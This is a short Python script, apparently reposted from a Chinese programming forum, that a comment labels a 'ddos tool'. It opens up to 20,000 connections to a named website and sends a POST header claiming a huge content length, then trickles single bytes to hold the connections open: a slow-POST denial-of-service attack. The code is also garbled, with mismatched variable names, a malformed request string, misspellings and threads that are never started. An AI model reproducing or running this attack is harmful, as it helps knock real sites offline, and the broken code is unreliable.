import socket
import time
import threading
#pressure Test,ddos tool
#----------------------------
MAX_CONN=20000
PORT=80
HOST="www.bjlovedog.com"
PADE="innndex.php"
#----------------------------
buff=("POST %s HTTP/1.1\r\n")
"Host: %s\r\n"
"content-Length:10000000\r\n"
"cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST)
socks=[]
def conn_thread(): global socks for i in range(0,MAX_CONN): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((HOST,PORT)) s.send(buf) print ("Send buf OK!,conn=%d\n")%i socks.append(s) except Exception : print ("Cold not connect to server or send err r:%s")%ex time.sleep(10)
#end def
def send_thread(): global socks while True: for s in socks: try: s.send("f") #print "send OK!" except Exception : print ("Send Exception:%s\n")%ex socks.remove(s) s.closse() time.sleep(1)
#end def
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/95159.html
上一篇:Pyecharts組合圖中,如何將折線圖顯示在柱狀圖上層!!!!
下一篇:資料分析方法請教
